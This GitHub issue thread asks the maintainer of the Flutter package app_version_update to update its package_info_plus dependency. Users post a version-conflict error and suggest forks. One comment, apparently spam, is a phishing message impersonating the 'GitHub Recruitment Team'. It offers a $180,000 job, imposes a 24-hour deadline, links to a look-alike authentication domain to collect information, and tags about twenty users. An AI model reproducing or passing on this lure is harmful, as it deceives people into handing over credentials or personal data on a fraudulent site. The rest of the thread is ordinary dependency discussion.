### ISSUE TITLE
Update package_info_plus package

### ISSUE THREAD

**Issue by KKranjcevic** [kauemurakami/app_version_update#23]
Please update package_info_plus to ^5.0.0 +

**Comment by huzeyfetascsi** [comment]
same issue, could you please upgrage?

```
Because app_version_update 4.0.1 depends on package_info_plus ^4.0.0 and no versions of app_version_update match >4.0.1 <5.0.0, app_version_update ^4.0.1
  requires package_info_plus ^4.0.0.
So, because tc depends on both package_info_plus ^5.0.1 and app_version_update ^4.0.1, version solving failed.
```

**Comment by Macacoazul01** [comment]
@kauemurakami you can merge this fork to be faster

https://github.com/gitgauss1/app_version_update

**Comment by cyny39** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
lucasgmagalhaes, @jnettome, @vlnk, @atilacamurca, @lucasvillaverde, @jonasmalacofilho, @Sayoan, @AlanDiegoF, @glairtonsantos, @bernardodesousa, @miguel-nascimento, @brauliobo, @leonardorifeli, @PedroAlbuquerque00, @vjnrv, @zlatkoc, @vingon-elias, @madebyluque, @rafaneri, @HDMiranda

**Comment by Macacoazul01** [comment]
@kauemurakami when are you planning to release a new version?

**Comment by romatallinn** [comment]
[package_info_plus](https://pub.dev/packages/package_info_plus) is already v8.0.0 lol

**Comment by romatallinn** [comment]
@kauemurakami?

**Comment by Macacoazul01** [comment]
@romatallinn you can use this fork if he doesnt update the original:
https://github.com/Macacoazul01/app_version_update

The deprecations are fixed and [package_info_plus](https://pub.dev/packages/package_info_plus) is at v8.0.0
